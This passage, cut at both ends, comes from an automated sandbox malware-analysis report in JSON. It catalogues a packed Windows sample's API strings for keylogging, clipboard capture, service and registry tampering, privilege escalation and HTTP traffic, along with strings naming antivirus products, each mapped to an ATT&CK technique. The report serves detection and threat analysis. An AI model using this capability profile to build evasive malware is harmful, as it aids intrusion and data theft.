\"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ControlService\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumDependentServicesA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetUserNameA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenEventLogA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseEventLog\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenServiceA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteService\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClipboardData\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenClipboard\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseClipboard\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumChildWindows\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumWindows\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCrackUrlA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSASocketA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSAIoctl\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-242", "type": 2, "relevance": 1, "name": "Contains ability to close a handle to a service (API string)", "description": "Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-191", "type": 2, "relevance": 1, "name": "Able to enumerate service (API string)", "description": "Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"EnumDependentServicesA\" (Indicator: \"EnumDependentServices\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"EnumDependentServicesA\" (Indicator: \"EnumDependentServices\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-108", "type": 1, "relevance": 3, "name": "Contains ability to dynamically load libraries", "description": "LoadLibraryA@KERNEL32.DLL at 00000000-00005224-52447-352-0040D9AC\n LoadLibraryA@KERNEL32.DLL at 00000000-00005224-52447-353-0040DC57\n LoadLibraryA@KERNEL32.DLL at 00000000-00005224-52447-394-00417BBF", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"McShield.exe\" (Indicator: \"mcshield.exe\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"zonealarm.exe\" (Indicator: \"zonealarm\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"NAVSCAN32.exe\" (Indicator: \"scan32.exe\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"KasperskyAVEng\" (Indicator: \"kaspersky\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"KasperskyAv\" (Indicator: \"kaspersky\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Antivirus\" (Indicator: \"antivirus\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"ZoneAlarm Pro\" (Indicator: \"zonealarm\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"ZoneAlarm\" (Indicator: \"zonealarm\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Nod32CC\" (Indicator: \"nod32\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"bitdefenderlive\" (Indicator: \"bitdefender\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Avast32\" (Indicator: \"avast\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"www.bitdefender.com\" (Indicator: \"bitdefender\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"www.trendmicro.com\" (Indicator: \"trendmicro\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"trendmicro.com\" (Indicator: \"trendmicro\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"www.kaspersky.com\" (Indicator: \"kaspersky\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"kaspersky.com\" (Indicator: \"kaspersky\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"www.f-secure.com\" (Indicator: \"f-secure\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"f-secure.com\" (Indicator: \"f-secure\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"sophos.com\" (Indicator: \"sophos\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"mcafee.com\" (Indicator: \"mcafee\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"symantec.com\" (Indicator: \"symantec\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"www.symantec.com\" (Indicator: \"symantec\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"AntiVirusOverride\" (Indicator: \"antivirus\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter RegisterServiceProcess (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4a176@RPCRT4.dll\"\n \"15001600c03ea36b@ADVAPI32.dll\"\n \"0e000f00703fa36b@ADVAPI32.dll\"\n \"0e000f00cc3fa36b@ADVAPI32.dll\"\n \"11001200b447a36b@ADVAPI32.dll\"\n \"110012004848a36b@ADVAPI32.dll\"\n \"120013008c48a36b@ADVAPI32.dll\"\n \"12001300e448a36b@ADVAPI32.dll\"\n \"14001500386ea36b@ADVAPI32.dll\"\n \"14001500506ea36b@ADVAPI32.dll\"\n \"14001500686ea36b@ADVAPI32.dll\"\n \"17001800806ea36b@ADVAPI32.dll\"\n \"0d000e00986ea36b@ADVAPI32.dll\"\n \"11001200a86ea36b@ADVAPI32.dll\"\n \"11001200bc6ea36b@ADVAPI32.dll\"\n \"0d000e004466a36b@WININET.dll\"\n \"0d000e00b466a36b@WININET.dll\"\n \"10001100ec66a36b@WININET.dll\"\n \"100011009067a36b@WININET.dll\"\n \"10001100006fa36b@WININET.dll\"\n \"10001100146fa36b@WININET.dll\"\n \"14001500286fa36b@WININET.dll\"\n \"14001500406fa36b@WININET.dll\"\n \"12001300586fa36b@WININET.dll\"\n \"120013006c6fa36b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has an executable section named \"UPX0\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has an writable section named \"UPX0\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has an writable section named \"UPX1\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-30", "type": 8, "relevance": 3, "name": "Contains ability to read the PEB (Process Environment Block) structure", "description": "\"sample.bin\" can read PEB structure (dword ptr fs:[00000030h]) (Offset: 51403)", "origin": "Binary File", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": 